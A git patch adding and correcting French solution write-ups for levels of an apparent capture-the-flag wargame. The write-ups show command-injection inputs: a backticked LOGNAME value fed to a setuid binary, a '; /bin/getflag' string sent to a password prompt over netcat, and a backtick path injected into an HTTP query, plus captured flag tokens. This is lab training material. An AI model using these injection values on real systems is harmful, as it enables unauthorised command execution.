From ec32401d40fa94bd3068cbe778255858042afd36 Mon Sep 17 00:00:00 2001
From: gbrochar <gaetanbrochard@protonmail.com>
Date: Sat, 30 Jan 2021 09:55:48 +0100
Subject: [PATCH] level07 + some typos

---
 level07/Ressources/solution | 23 +++++++++++++++++++++++
 level09/Ressources/solution |  4 ++--
 level11/Ressources/solution |  2 +-
 level12/Ressources/solution |  4 +++-
 4 files changed, 29 insertions(+), 4 deletions(-)
 create mode 100644 level07/Ressources/solution

diff --git a/level07/Ressources/solution b/level07/Ressources/solution
new file mode 100644
index 0000000..5f50e64
--- /dev/null
+++ b/level07/Ressources/solution
@@ -0,0 +1,23 @@
+Il y a un binaire level07, on execute strings dessus.
+
+Plusieurs chose interessantes, il y a un `echo %s`, si on arrive a faire en sorte que %s soit `getflag` alors on reussira le niveau.
+
+Il y a aussi getenv, on peut donc deduire que l'env est utile au programme.
+
+On execute le programme, il affiche level07. Au debut nous avons cru qu'il affichait le nom du binaire mais en le telechargeant sur mon PC,
+il affichait gbrochar, on en deduit donc qu'il print le username via l'env
+
+USER=`getflag` ./level07
+ne change rien, il reste logname
+
+LOGNAME=`getflag` ./level07
+
+Check flag.Here is your token :
+sh: 2: Syntax error: ")" unexpected
+
+on rajoute des backslashs
+
+LOGNAME=\`getflag\` ./level07
+Check flag.Here is your token : fiumuikeil55xe9cu4dood66h
+
+Cela marche
\ No newline at end of file
diff --git a/level09/Ressources/solution b/level09/Ressources/solution
index 442aba7..0921f5e 100644
--- a/level09/Ressources/solution
+++ b/level09/Ressources/solution
@@ -1,4 +1,4 @@
-dans le home de level09 il y a 9 fichier appartenant a flag09:
+dans le home de level09 il y a 2 fichier appartenant a flag09:
 
 -rwsr-sr-x 1 flag09  level09 7640 Mar  5  2016 level09*
 ----r--r-- 1 flag09  level09   26 Mar  5  2016 token
@@ -32,7 +32,7 @@ $ gcc Ressource/decode.c && ./a.out
 
 le dernier charactere corespond au "\n"
 
-on peut donc se conecter ayu compte flag09 puis recuperer le mot de passe du level10
+on peut donc se connecter au compte flag09 puis recuperer le mot de passe du level10
 
 
 
diff --git a/level11/Ressources/solution b/level11/Ressources/solution
index 2660401..7e11531 100644
--- a/level11/Ressources/solution
+++ b/level11/Ressources/solution
@@ -18,7 +18,7 @@ $ nc localhost 5151
 * On va essayer de lancer getflag en arretant la comande avec ';'
 
 $ nc localhost 5151
-> Password: ; /bin/getevn > /tmp/bingo
+> Password: ; /bin/getflag > /tmp/bingo
 
 $ cat /tmp/bingo
 > Check flag.Here is your token : fa6v5ateaw21peobuub8ipe6s
diff --git a/level12/Ressources/solution b/level12/Ressources/solution
index 14a36bc..da2af1f 100644
--- a/level12/Ressources/solution
+++ b/level12/Ressources/solution
@@ -8,7 +8,7 @@
 # On ne poura donc pas executer de comande en tant que tel.
 # mais on peut executer un fichier
 
-# Dans un fichier /tmp/.TOTO ont va mettre le comptenue suivant:
+# Dans un fichier /tmp/.TOTO ont va mettre le contenu suivant:
 
 	#!/bin/sh
 	getflag > /tmp/.flag12 
@@ -18,6 +18,8 @@
 $ nc -v localhost 4646
 > GET /?x=`/*/.TOTO`
 
+l'autocompletion change le * en tmp, ce qui nous permet d'executer dans tmp malgre la regex qui upcase.
+
 $ cat /tmp/.flag12
 > Check flag.Here is your token : g1qKMiRpXf53AWhDaU7FEkczr